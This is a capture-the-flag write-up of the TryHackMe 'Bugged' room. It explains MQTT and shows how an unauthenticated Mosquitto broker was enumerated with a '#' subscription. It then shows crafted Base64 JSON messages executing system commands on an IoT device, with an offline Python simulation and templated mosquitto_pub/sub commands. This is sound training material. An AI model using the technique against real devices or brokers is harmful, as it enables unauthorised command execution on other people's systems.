We covered working with Internet of Things devices, went over the MQTT protocol, demonstrated the publisher/subscriber model and performed RCE. This was part of TryHackMe Bugged.
John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?
Understanding the Setup
I explained that John's smart home appliance is most likely talking to his smartphone or computer. That communication runs over the home network, meaning the appliance is connected to John's Wi-Fi and is running a service that sends and receives data (metrics such as temperature or movement). My goal was to identify the port that service was listening on.
Discovering the Protocol and Architecture
Using an Nmap scan, I found that port 1883 (TCP) was open and running Mosquitto version 2.0.14, an MQTT broker. I described MQTT as a lightweight, machine-to-machine publish/subscribe protocol common in IoT devices, designed for resource-constrained devices and networks.
I detailed the MQTT architecture:
- Publisher: Sends data (e.g., the smart home appliance sending sensor metrics).
- Subscriber: Receives data (e.g., John’s smartphone or computer).
- MQTT Broker: The server that receives every published message and forwards it to the clients subscribed to its topic. Both publisher and subscriber are clients of the broker; they never talk to each other directly.
- Topics: Named channels the broker routes messages by (e.g., "lights," "camera," "temperature"). A publisher publishes to a topic and subscribers subscribe to it to receive its messages.
Investigating the “Weird Traffic”
The "weird traffic" referred to messages and topics exchanged between the appliance (publisher) and John's device (subscriber) via the MQTT broker. To uncover these messages, I needed to play both the publisher and subscriber roles myself. The broker is Mosquitto; the client programs I used to talk to it were mosquitto_sub and mosquitto_pub.
Using the Mosquitto Clients
I demonstrated how to use the mosquitto_sub client program. Key options included:
- -h or --host: Specifies the MQTT host (the IP address of the smart appliance).
- -t: Specifies the MQTT topic to subscribe to.
To see every topic, I subscribed with the pound character (#) as a wildcard topic; this only works because the broker accepted an unauthenticated client and let it subscribe to everything. Among the listed topics, one appeared to be Base64 encoded. I decoded this Base64 string using CyberChef, revealing a JSON structure with an ID, a "registered_commands" array (help, CMD, sys), a publisher topic (pub_topic), and a subscriber topic (sub_topic).
Simulating Communication and Executing Commands
My next step was to publish to the discovered pub_topic while listening on the corresponding sub_topic. Initially, I made the mistake of using mosquitto_sub for both publishing and subscribing. The correct approach is to use mosquitto_pub for publishing and mosquitto_sub for listening.
When I sent a test message, the response was another Base64 string indicating an "invalid message format" and providing the expected format: {"id": "BACK.ID", "CMD": "COMMAND", "ARG": "ARGUMENT"}.
To execute commands, I needed to:
- Use the ID from the decoded weird topic.
- Set "CMD" to "CMD" (one of the registered commands).
- Set "ARG" to the system command I wanted to run (e.g., ls).
- Encode this entire JSON payload into Base64.
- Publish this Base64-encoded message to pub_topic using mosquitto_pub with the -m flag for the message, while mosquitto_sub was listening on sub_topic.
The response to the ls command was another Base64 string which, when decoded, showed the file listing, including a flag file. I then repeated the process, changing the argument to cat flag.txt to retrieve the flag's content.
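The framing behind the steps above, as an added example that is not part of the original writeup or the room: the Base64/JSON encoding of the weird topic and of each command, the argv for the two Mosquitto client calls, and a simulated device that answers the way the real one did (an "invalid message format" reply for a malformed message, a Base64 reply otherwise). The device ID, topic names, the response field names and the directory listing are constructed sample values, not the room's real ones.

```python
"""Added example: the Base64/JSON framing used in the Bugged exchange,
with both sides simulated offline (no broker needed)."""
import base64
import json

# Constructed sample of the "weird" topic: Base64 over JSON with the four
# fields the writeup found. All values here are assumed, not the room's.
SAMPLE_DEVICE = {
    "id": "EXAMPLE-DEVICE-ID",
    "registered_commands": ["help", "CMD", "sys"],
    "pub_topic": "example/device/pub",
    "sub_topic": "example/device/sub",
}
WEIRD_TOPIC = base64.b64encode(json.dumps(SAMPLE_DEVICE).encode()).decode()

# Constructed sample output for the simulated "ls".
FAKE_LISTING = "flag.txt\nmain.py"


def b64_json_decode(blob: str):
    """Decode a Base64 string carrying JSON (what CyberChef did in the writeup).
    Raises ValueError on bad Base64, bad UTF-8 or bad JSON."""
    return json.loads(base64.b64decode(blob, validate=True).decode("utf-8"))


def b64_json_encode(obj) -> str:
    return base64.b64encode(json.dumps(obj).encode()).decode()


def build_command(device_id: str, cmd: str, arg: str) -> str:
    """Frame a command in the format the device demanded:
    {"id": "BACK.ID", "CMD": "COMMAND", "ARG": "ARGUMENT"}, Base64-encoded."""
    return b64_json_encode({"id": device_id, "CMD": cmd, "ARG": arg})


def mosquitto_pub_argv(host: str, topic: str, message: str) -> list:
    """argv for mosquitto_pub using only the flags the writeup used."""
    return ["mosquitto_pub", "-h", host, "-t", topic, "-m", message]


def mosquitto_sub_argv(host: str, topic: str) -> list:
    """argv for mosquitto_sub listening on one topic."""
    return ["mosquitto_sub", "-h", host, "-t", topic]


def device_handle(message_b64: str, device: dict) -> str:
    """Simulated device side (assumed behaviour, mirroring what the writeup
    observed): reject malformed messages, require the device's own id and a
    registered CMD, otherwise answer with a Base64-encoded JSON reply."""
    try:
        req = b64_json_decode(message_b64)
    except ValueError:
        req = None
    if not isinstance(req, dict) or not all(k in req for k in ("id", "CMD", "ARG")):
        return b64_json_encode({
            "error": "invalid message format",
            "format": {"id": "BACK.ID", "CMD": "COMMAND", "ARG": "ARGUMENT"},
        })
    if req["id"] != device["id"] or req["CMD"] not in device["registered_commands"]:
        return b64_json_encode({"error": "unknown id or command"})
    # The real device runs the argument as a system command here; the
    # simulation returns canned text instead.
    output = FAKE_LISTING if req["ARG"] == "ls" else f"(simulated output of {req['ARG']})"
    return b64_json_encode({"id": device["id"], "CMD": req["CMD"], "RESPONSE": output})


def run_exchange(host: str, arg: str) -> dict:
    """Client side of one round trip: decode the weird topic, frame a CMD
    message, publish it to pub_topic, read the reply from sub_topic.
    Returns the decoded reply plus the two argv lists you would actually run."""
    device = b64_json_decode(WEIRD_TOPIC)
    message = build_command(device["id"], "CMD", arg)
    pub = mosquitto_pub_argv(host, device["pub_topic"], message)
    sub = mosquitto_sub_argv(host, device["sub_topic"])
    reply = b64_json_decode(device_handle(message, device))
    return {"pub_argv": pub, "sub_argv": sub, "reply": reply}


if __name__ == "__main__":
    print(run_exchange("10.10.10.10", "ls")["reply"]["RESPONSE"])
```

Sending the literal string "test" through device_handle reproduces the first failed attempt: it is valid Base64 but does not decode to JSON, so the simulated device returns the format hint. Replacing "ls" with "cat flag.txt" only changes the ARG field; the id and CMD stay fixed, which is why the decoded topic had to be kept.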
Conclusion
I concluded that this was a good learning experience and a starting point for IoT penetration testing. Understanding the MQTT protocol, the publisher/subscriber architecture, and the role of the broker is crucial. By reading the command format and allowed commands out of the topic structure, I was able to execute system commands on the IoT device.
Technical Commands Used on the Terminal
- Display help for mosquitto_sub:
mosquitto_sub --help
- Subscribe to all topics on the host (the # wildcard matches every topic):
mosquitto_sub -t "#" -h [IP_ADDRESS]
- Listen on the subscriber topic from the decoded weird traffic for responses:
mosquitto_sub -t "[SUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS]
- Publish a test message to the publisher topic (corrected usage with mosquitto_pub):
mosquitto_pub -t "[PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS] -m "test"
- Publish the crafted Base64 command payload to the publisher topic:
mosquitto_pub -t "[PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS] -m "[BASE64_ENCODED_COMMAND_PAYLOAD]"
This was done twice:
- First with the ls command payload.
- Second with the cat flag.txt command payload.